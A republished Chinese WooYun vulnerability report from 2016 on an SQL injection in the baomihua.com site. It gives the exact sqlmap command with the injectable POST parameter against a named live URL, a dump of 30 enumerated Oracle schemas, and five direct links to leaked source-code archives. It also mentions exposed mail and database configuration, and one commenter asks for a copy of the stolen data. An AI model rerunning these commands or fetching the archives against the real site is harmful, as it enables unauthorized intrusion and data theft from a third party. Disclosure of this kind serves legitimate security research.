爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

admin 2017年4月2日01:24:57评论397 views字数 234阅读0分46秒阅读模式
摘要

2016-03-25: 细节已通知厂商并且等待厂商处理中
2016-03-25: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-03-30: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(15) 关注此漏洞

缺陷编号: WooYun-2016-188855

漏洞标题: 爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

相关厂商: 爆米花网

漏洞作者: 黑色键盘丶

提交时间: 2016-03-25 11:33

公开时间: 2016-03-30 11:40

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 18

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 注射技巧

3人收藏


漏洞详情

披露状态:

2016-03-25: 细节已通知厂商并且等待厂商处理中
2016-03-25: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-03-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

code 区域
注入点:F:/sqlmap>sqlmap.py -u "http://www.baomihua.com/space/RankAllList.aspx" --data "classid=774" --dbs

数据库30个 可裤裤查询

code 区域
back-end DBMS: Oracle
available databases [30]:
[*] APEX_030200
[*] APPQOSSYS
[*] CHEAT
[*] CHENZH
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] LIGZ
[*] LINJS
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] POMOHO
[*] POMOHOMOBILE
[*] QINYM
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] WUXG
[*] XDB
[*] XIAL
[*] ZHANGXL
[*] ZHAOLH
[*] ZLY

当前库POMOHO 2449个表 跑的实在太慢了2分钟一个表 跑了2小时才几十个表估算一下要80个小时才可以跑完 这里就证明下危害

爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

数据库SYS也跑了下 976张表

爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

数据库OLAPSYS 126张表

爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

跑了几个数据量大的库证明下危害 表的话要好几天就不深入了

还有几处源代码泄露的

code 区域
1:http://static.baomihua.com/doc.rar
2:http://show.baomihua.com/baomihua.tar.gz
3:http://resources.baomihua.com/swf.rar
4:http://reg.baomihua.com/reg.rar
5:http://pvstat.baomihua.com/wwwroot.rar

导致敏感信息泄露配置文件等等 艾米直播网站的

爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

邮箱服务器信息

爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

数据库配置信息

爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

这边没装打不开配置文件

爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

漏洞证明:

code 区域
注入点:F:/sqlmap>sqlmap.py -u "http://www.baomihua.com/space/RankAllList.aspx" --data "classid=774" --dbs

数据库30个 可裤裤查询

code 区域
back-end DBMS: Oracle
available databases [30]:
[*] APEX_030200
[*] APPQOSSYS
[*] CHEAT
[*] CHENZH
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] LIGZ
[*] LINJS
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] POMOHO
[*] POMOHOMOBILE
[*] QINYM
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] WUXG
[*] XDB
[*] XIAL
[*] ZHANGXL
[*] ZHAOLH
[*] ZLY

当前库POMOHO 2449个表 跑的实在太慢了2分钟一个表 跑了2小时才几十个表估算一下要80个小时才可以跑完 这里就证明下危害

爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

数据库SYS也跑了下 976张表

爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

数据库OLAPSYS 126张表

爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

跑了几个数据量大的库证明下危害 表的话要好几天就不深入了

还有几处源代码泄露的

code 区域
1:http://static.baomihua.com/doc.rar
2:http://show.baomihua.com/baomihua.tar.gz
3:http://resources.baomihua.com/swf.rar
4:http://reg.baomihua.com/reg.rar
5:http://pvstat.baomihua.com/wwwroot.rar

导致敏感信息泄露配置文件等等 艾米直播网站的

爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

邮箱服务器信息

爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

数据库配置信息

爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

这边没装打不开配置文件

爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

修复方案:

过滤

版权声明:转载请注明来源 黑色键盘丶@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-03-30 11:40

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-03-25 18:44 | 黑色键盘丶 ( 普通白帽子 | Rank:2413 漏洞数:511 | 哥,是孤独风中的一匹狼)

    1

    要是有礼物就好啦 嘿嘿

  2. 2016-03-25 21:08 | Pzacker ( 实习白帽子 | Rank:92 漏洞数:34 )

    1

    我也找到了,

  3. 2016-03-25 21:13 | 黑色键盘丶 ( 普通白帽子 | Rank:2413 漏洞数:511 | 哥,是孤独风中的一匹狼)

    1

    @Pzacker o

  4. 2016-03-25 21:54 | Pzacker ( 实习白帽子 | Rank:92 漏洞数:34 )

    1

    @黑色键盘丶 你找的是参数是class等额吗

  5. 2016-03-25 22:03 | Pzacker ( 实习白帽子 | Rank:92 漏洞数:34 )

    1

    是class的那个参数的吗。、。。

  6. 2016-03-25 22:09 | 黑色键盘丶 ( 普通白帽子 | Rank:2413 漏洞数:511 | 哥,是孤独风中的一匹狼)

    1

    @Pzacker 哪个

  7. 2016-03-30 20:20 | 邪少 ( 实习白帽子 | Rank:98 漏洞数:18 | 百里长苏)

    1

    厂商已经主动忽略漏洞,细节向公众公开 说明无影响 记得 数据发我一份

  8. 2016-03-31 18:37 | ..%2fcorps%2f ( 路人 | Rank:16 漏洞数:4 | 普通白帽子 | Rank:642 漏洞数:263)

    1

    装逼啊 小伙子

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin